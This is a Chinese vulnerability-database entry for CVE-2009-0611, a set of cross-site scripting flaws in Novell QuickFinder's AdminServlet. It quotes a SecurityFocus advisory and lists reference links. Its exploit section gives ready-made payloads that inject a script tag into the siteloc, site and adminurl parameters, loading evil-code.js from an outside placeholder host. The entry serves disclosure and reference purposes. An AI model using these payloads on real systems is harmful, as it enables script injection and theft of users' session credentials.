Novell Open Enterprise Server QuickFinder多个跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117364 漏洞类型 跨站脚本
发布时间 2009-02-09 更新时间 2009-02-20
CVE编号 CVE-2009-0611 CNNVD-ID CNNVD-200902-379
漏洞平台 Novell CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/32795
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-379
|漏洞详情
QuickFinder是NovellOpenEnterpriseServer中所提供的搜索服务器,可以将搜索和打印功能添加到任何万维网站点或内网。QuickFinder没有验证对qfsearch/AdminServlet所传送的siteloc、site、adminurl和print-list参数便返回给了用户,这允许远程攻击者通过提交恶意请求执行跨站脚本攻击,导致在用户浏览器会话中执行任意HTML和脚本代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/33708/info

Novell QuickFinder Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

"add virtual server"

https://server:2200/qfsearch/AdminServlet?&req=displayaddsite

Post:
siteloc=%22%3E%3Cscript%20src=http://www.example2.com/scripts/evil-code.js%3E%3C/script%3E

"Default"

Post:
https://server:2200/qfsearch/AdminServlet?site=globalsearchsite&req=generalproperties
site="><script 
src=http://www.www.example2.com/scripts/evil-code.js></script>

"services, synchronization"

Post:
https://server:2200/qfsearch/AdminServlet?&req=clusterserviceproperties
site="><script 
src=http://www.www.example2.com/scripts/evil-code.js></script>


Querystring:

https://server2200/qfsearch/AdminServlet?&req=global&adminurl="><script 
src=http://www.www.example2.com/scripts/evil-code.js></script>
|参考资料

来源:XF
名称:quickfinderserver-multiple-xss(48619)
链接:http://xforce.iss.net/xforce/xfdb/48619
来源:SECTRACK
名称:1021695
链接:http://www.securitytracker.com/id?1021695
来源:BID
名称:33708
链接:http://www.securityfocus.com/bid/33708
来源:VUPEN
名称:ADV-2009-0421
链接:http://www.frsirt.com/english/advisories/2009/0421
来源:SECUNIA
名称:33886
链接:http://secunia.com/advisories/33886
来源:MISC
链接:http://packetstormsecurity.org/0902-exploits/nqfs-xss.txt
来源:OSVDB
名称:51941
链接:http://osvdb.org/51941